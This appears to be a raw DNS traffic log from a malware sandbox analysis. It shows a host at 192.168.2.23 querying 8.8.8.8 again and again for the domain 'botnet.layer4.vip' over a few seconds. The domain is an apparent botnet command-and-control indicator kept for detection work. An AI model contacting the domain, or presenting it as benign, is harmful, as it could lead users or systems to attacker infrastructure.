                                  Apr 9, 2023 03:31:31.215178013 CEST192.168.2.238.8.8.80x36b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.231009960 CEST192.168.2.238.8.8.80x36b1Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.255434990 CEST192.168.2.238.8.8.80x4a60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.271126032 CEST192.168.2.238.8.8.80x4a60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.295288086 CEST192.168.2.238.8.8.80x4a60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.310724020 CEST192.168.2.238.8.8.80x4a60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.335083008 CEST192.168.2.238.8.8.80x4a60Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.351073027 CEST192.168.2.238.8.8.80x86dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.366723061 CEST192.168.2.238.8.8.80x86dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.391196966 CEST192.168.2.238.8.8.80x86dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.406838894 CEST192.168.2.238.8.8.80x86dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.431361914 CEST192.168.2.238.8.8.80x86dcStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.455734968 CEST192.168.2.238.8.8.80xaf7aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.480247021 CEST192.168.2.238.8.8.80xaf7aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.504442930 CEST192.168.2.238.8.8.80xaf7aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.529014111 CEST192.168.2.238.8.8.80xaf7aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.553622007 CEST192.168.2.238.8.8.80xaf7aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.569251060 CEST192.168.2.238.8.8.80x55adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.593637943 CEST192.168.2.238.8.8.80x55adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.617989063 CEST192.168.2.238.8.8.80x55adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.634010077 CEST192.168.2.238.8.8.80x55adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.658227921 CEST192.168.2.238.8.8.80x55adStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.682948112 CEST192.168.2.238.8.8.80x6cd8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.707632065 CEST192.168.2.238.8.8.80x6cd8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.723609924 CEST192.168.2.238.8.8.80x6cd8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.748161077 CEST192.168.2.238.8.8.80x6cd8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.772303104 CEST192.168.2.238.8.8.80x6cd8Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.788348913 CEST192.168.2.238.8.8.80x54a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.804332018 CEST192.168.2.238.8.8.80x54a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.820012093 CEST192.168.2.238.8.8.80x54a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.844459057 CEST192.168.2.238.8.8.80x54a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.868766069 CEST192.168.2.238.8.8.80x54a9Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.884685993 CEST192.168.2.238.8.8.80xb75dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.900697947 CEST192.168.2.238.8.8.80xb75dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.925133944 CEST192.168.2.238.8.8.80xb75dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.941039085 CEST192.168.2.238.8.8.80xb75dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.965121984 CEST192.168.2.238.8.8.80xb75dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.981003046 CEST192.168.2.238.8.8.80x93a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:31.996860027 CEST192.168.2.238.8.8.80x93a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.012384892 CEST192.168.2.238.8.8.80x93a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.028239012 CEST192.168.2.238.8.8.80x93a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.044083118 CEST192.168.2.238.8.8.80x93a4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.068165064 CEST192.168.2.238.8.8.80xf33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.083595991 CEST192.168.2.238.8.8.80xf33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.107630014 CEST192.168.2.238.8.8.80xf33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.123105049 CEST192.168.2.238.8.8.80xf33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.147480965 CEST192.168.2.238.8.8.80xf33eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.163036108 CEST192.168.2.238.8.8.80x15b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.178491116 CEST192.168.2.238.8.8.80x15b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.202768087 CEST192.168.2.238.8.8.80x15b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.218492031 CEST192.168.2.238.8.8.80x15b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.242902994 CEST192.168.2.238.8.8.80x15b4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.258766890 CEST192.168.2.238.8.8.80x48f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.274456978 CEST192.168.2.238.8.8.80x48f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.298485041 CEST192.168.2.238.8.8.80x48f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.314371109 CEST192.168.2.238.8.8.80x48f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.329982042 CEST192.168.2.238.8.8.80x48f4Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.345911980 CEST192.168.2.238.8.8.80x7850Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.370141983 CEST192.168.2.238.8.8.80x7850Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.386068106 CEST192.168.2.238.8.8.80x7850Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.401755095 CEST192.168.2.238.8.8.80x7850Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.426237106 CEST192.168.2.238.8.8.80x7850Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.441904068 CEST192.168.2.238.8.8.80x579dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.457923889 CEST192.168.2.238.8.8.80x579dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.482109070 CEST192.168.2.238.8.8.80x579dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.498090982 CEST192.168.2.238.8.8.80x579dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.513576031 CEST192.168.2.238.8.8.80x579dStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.529104948 CEST192.168.2.238.8.8.80x9ebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.545027018 CEST192.168.2.238.8.8.80x9ebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.560682058 CEST192.168.2.238.8.8.80x9ebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.585021019 CEST192.168.2.238.8.8.80x9ebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.609499931 CEST192.168.2.238.8.8.80x9ebaStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.633750916 CEST192.168.2.238.8.8.80x2751Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.658230066 CEST192.168.2.238.8.8.80x2751Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.674057007 CEST192.168.2.238.8.8.80x2751Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.698724031 CEST192.168.2.238.8.8.80x2751Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.723109007 CEST192.168.2.238.8.8.80x2751Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.738912106 CEST192.168.2.238.8.8.80x80dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.763303041 CEST192.168.2.238.8.8.80x80dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.779392004 CEST192.168.2.238.8.8.80x80dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.795396090 CEST192.168.2.238.8.8.80x80dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.811511993 CEST192.168.2.238.8.8.80x80dbStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.836235046 CEST192.168.2.238.8.8.80xdd37Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.860755920 CEST192.168.2.238.8.8.80xdd37Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.876439095 CEST192.168.2.238.8.8.80xdd37Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.892220020 CEST192.168.2.238.8.8.80xdd37Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.908199072 CEST192.168.2.238.8.8.80xdd37Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.924278021 CEST192.168.2.238.8.8.80xce22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.940345049 CEST192.168.2.238.8.8.80xce22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.964739084 CEST192.168.2.238.8.8.80xce22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:32.989717007 CEST192.168.2.238.8.8.80xce22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.014301062 CEST192.168.2.238.8.8.80xce22Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.030487061 CEST192.168.2.238.8.8.80xbf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.046438932 CEST192.168.2.238.8.8.80xbf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.062092066 CEST192.168.2.238.8.8.80xbf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.077749968 CEST192.168.2.238.8.8.80xbf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.093422890 CEST192.168.2.238.8.8.80xbf7bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.109522104 CEST192.168.2.238.8.8.80xd307Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.125293970 CEST192.168.2.238.8.8.80xd307Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.149781942 CEST192.168.2.238.8.8.80xd307Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.174340010 CEST192.168.2.238.8.8.80xd307Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.190340042 CEST192.168.2.238.8.8.80xd307Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.206367016 CEST192.168.2.238.8.8.80xcb0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.222307920 CEST192.168.2.238.8.8.80xcb0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.237974882 CEST192.168.2.238.8.8.80xcb0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.253577948 CEST192.168.2.238.8.8.80xcb0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.269459009 CEST192.168.2.238.8.8.80xcb0aStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.285270929 CEST192.168.2.238.8.8.80x12bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.301265001 CEST192.168.2.238.8.8.80x12bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.317178965 CEST192.168.2.238.8.8.80x12bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.341192007 CEST192.168.2.238.8.8.80x12bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.365174055 CEST192.168.2.238.8.8.80x12bfStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.389661074 CEST192.168.2.238.8.8.80x2f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.413789034 CEST192.168.2.238.8.8.80x2f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.429615021 CEST192.168.2.238.8.8.80x2f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.453996897 CEST192.168.2.238.8.8.80x2f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.469825029 CEST192.168.2.238.8.8.80x2f5Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.485354900 CEST192.168.2.238.8.8.80xc40fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.509386063 CEST192.168.2.238.8.8.80xc40fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.525218010 CEST192.168.2.238.8.8.80xc40fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.540977001 CEST192.168.2.238.8.8.80xc40fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.565080881 CEST192.168.2.238.8.8.80xc40fStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.589274883 CEST192.168.2.238.8.8.80x31fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.613327026 CEST192.168.2.238.8.8.80x31fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.628783941 CEST192.168.2.238.8.8.80x31fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.652889967 CEST192.168.2.238.8.8.80x31fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.668437004 CEST192.168.2.238.8.8.80x31fdStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.684668064 CEST192.168.2.238.8.8.80x4841Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.709697008 CEST192.168.2.238.8.8.80x4841Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.725362062 CEST192.168.2.238.8.8.80x4841Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.749908924 CEST192.168.2.238.8.8.80x4841Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.774281979 CEST192.168.2.238.8.8.80x4841Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.799030066 CEST192.168.2.238.8.8.80x4238Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.823285103 CEST192.168.2.238.8.8.80x4238Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.838973999 CEST192.168.2.238.8.8.80x4238Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.863331079 CEST192.168.2.238.8.8.80x4238Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.879199028 CEST192.168.2.238.8.8.80x4238Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.895158052 CEST192.168.2.238.8.8.80x247eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.919418097 CEST192.168.2.238.8.8.80x247eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.935352087 CEST192.168.2.238.8.8.80x247eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.959510088 CEST192.168.2.238.8.8.80x247eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:33.983871937 CEST192.168.2.238.8.8.80x247eStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.009239912 CEST192.168.2.238.8.8.80x7f49Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.027146101 CEST192.168.2.238.8.8.80x7f49Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.045067072 CEST192.168.2.238.8.8.80x7f49Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.069632053 CEST192.168.2.238.8.8.80x7f49Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.093852043 CEST192.168.2.238.8.8.80x7f49Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.109894037 CEST192.168.2.238.8.8.80x6214Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.125533104 CEST192.168.2.238.8.8.80x6214Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.141279936 CEST192.168.2.238.8.8.80x6214Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.165621996 CEST192.168.2.238.8.8.80x6214Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.190234900 CEST192.168.2.238.8.8.80x6214Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.215001106 CEST192.168.2.238.8.8.80x6c09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.239669085 CEST192.168.2.238.8.8.80x6c09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.264008999 CEST192.168.2.238.8.8.80x6c09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.288635015 CEST192.168.2.238.8.8.80x6c09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.313081026 CEST192.168.2.238.8.8.80x6c09Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.340679884 CEST192.168.2.238.8.8.80x7464Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.356462002 CEST192.168.2.238.8.8.80x7464Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.372200012 CEST192.168.2.238.8.8.80x7464Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.396653891 CEST192.168.2.238.8.8.80x7464Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.412283897 CEST192.168.2.238.8.8.80x7464Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.427939892 CEST192.168.2.238.8.8.80x5164Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.443551064 CEST192.168.2.238.8.8.80x5164Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.467665911 CEST192.168.2.238.8.8.80x5164Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.483218908 CEST192.168.2.238.8.8.80x5164Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.498789072 CEST192.168.2.238.8.8.80x5164Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.514370918 CEST192.168.2.238.8.8.80x4ea0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.538418055 CEST192.168.2.238.8.8.80x4ea0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.562757015 CEST192.168.2.238.8.8.80x4ea0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.586863041 CEST192.168.2.238.8.8.80x4ea0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.610984087 CEST192.168.2.238.8.8.80x4ea0Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.626558065 CEST192.168.2.238.8.8.80xd6e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.650674105 CEST192.168.2.238.8.8.80xd6e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.675169945 CEST192.168.2.238.8.8.80xd6e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.699606895 CEST192.168.2.238.8.8.80xd6e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.723994017 CEST192.168.2.238.8.8.80xd6e7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.748356104 CEST192.168.2.238.8.8.80x681bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.763897896 CEST192.168.2.238.8.8.80x681bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.788079977 CEST192.168.2.238.8.8.80x681bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.803942919 CEST192.168.2.238.8.8.80x681bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.819653988 CEST192.168.2.238.8.8.80x681bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.844044924 CEST192.168.2.238.8.8.80xf6f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.859597921 CEST192.168.2.238.8.8.80xf6f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.883774996 CEST192.168.2.238.8.8.80xf6f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.908195972 CEST192.168.2.238.8.8.80xf6f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.923922062 CEST192.168.2.238.8.8.80xf6f7Standard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.939891100 CEST192.168.2.238.8.8.80x41beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.955847025 CEST192.168.2.238.8.8.80x41beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:34.980037928 CEST192.168.2.238.8.8.80x41beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.004241943 CEST192.168.2.238.8.8.80x41beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.020237923 CEST192.168.2.238.8.8.80x41beStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.036421061 CEST192.168.2.238.8.8.80x191bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.060702085 CEST192.168.2.238.8.8.80x191bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.085223913 CEST192.168.2.238.8.8.80x191bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.101174116 CEST192.168.2.238.8.8.80x191bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:35.125314951 CEST192.168.2.238.8.8.80x191bStandard query (0)botnet.layer4.vipA (IP address)IN (0x0001)false
